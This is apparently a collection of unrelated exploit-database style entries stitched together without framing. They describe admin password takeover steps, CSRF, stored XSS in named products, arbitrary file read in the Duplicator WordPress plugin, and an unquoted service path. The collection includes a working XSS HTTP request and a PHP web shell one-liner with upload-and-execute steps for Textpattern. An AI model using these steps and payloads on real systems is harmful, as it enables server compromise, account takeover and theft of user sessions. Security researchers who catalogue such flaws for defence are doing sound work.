1) Navigate to target.com/account [this holds the administrator login console]. 2) Change the URL to target.com/account/register [here it is possible to set a new password for the administrator user]. 3) After changing the administrator password, log in to the console, navigate to target.com/configuration/authentication and set a new password for any of the users. 4) Navigate to target.com/webui/repos and log in with the recently changed password for the user from step 3. 5) You now have access to the webadmin server.
The application does not use any security token to protect against CSRF. Therefore, a malicious user can add a new administrator user account by using a crafted POST request.
A stored cross-site scripting (XSS) vulnerability exists in Company's Recruitment Management System 1.0, which allows an attacker to inject malicious JavaScript code into the 'description' field of the 'Vacancies' tab. An attacker can exploit this vulnerability by logging in with a staff account, navigating to the 'Vacancies' tab, clicking on 'Add New Vacancy', entering any random information in the other fields, and then entering a malicious JavaScript payload in the 'Description' field. When a user views the details of the vacancy, the malicious JavaScript code will be executed in the user's browser.
Mitsubishi Electric & INEA SmartRTU is vulnerable to source code disclosure. An attacker can send a specially crafted HTTP request to the vulnerable server and view the source code of the application. This vulnerability affects Windows systems.
A stored cross-site scripting vulnerability exists in Company's Recruitment Management System 1.0, which allows an attacker to inject malicious JavaScript code into the 'title' field of the 'vacancies' tab. An attacker can exploit this vulnerability by sending a malicious payload to the 'title' field of the 'vacancies' tab. This payload will be executed when a user visits the application.
This exploit allows an unauthenticated attacker to read arbitrary files on the server by exploiting a vulnerability in the WordPress plugin Duplicator version 1.3.26. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'file' parameter of the 'duplicator_download' action of the 'admin-ajax.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script, which will allow the attacker to read arbitrary files on the server.
A stored cross-site scripting (XSS) vulnerability in Support Board 3.3.4 allows an attacker to inject malicious JavaScript code into the 'Message' field of a conversation. This code is then stored in the database and executed when the conversation is viewed by an administrator or other user. The malicious code can be used to steal session cookies, redirect users to malicious websites, or perform other malicious actions.
An alert box can be generated with the following payload:
    GET /lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E HTTP/1.1
    Host: Forster
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Cookie: PHPSESSID=7db442d0ed0f9c8e21f5151c3711973e
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept-Language: en-gb
    Accept-Encoding: gzip, deflate
    Connection: close
Unquoted Service Path is a vulnerability that occurs when the path of a service contains spaces and is not surrounded by quotation marks. This can allow an attacker to insert their own malicious code in the system root path undetected by the OS or other security applications, which can be executed with the elevated privileges of the application.
First of all, an attacker should use the file upload section to upload a malicious shell containing the code <?PHP system($_GET['cmd']);?>. Then, the attacker should go to the content section, click Files and upload the malicious PHP file. Finally, the attacker should go to the URL of the malicious file with the command as a parameter (e.g. yourserver/textpattern/files/yourphp.php?cmd=yourcode;). After the malicious file is uploaded, the attacker can execute arbitrary commands on the server.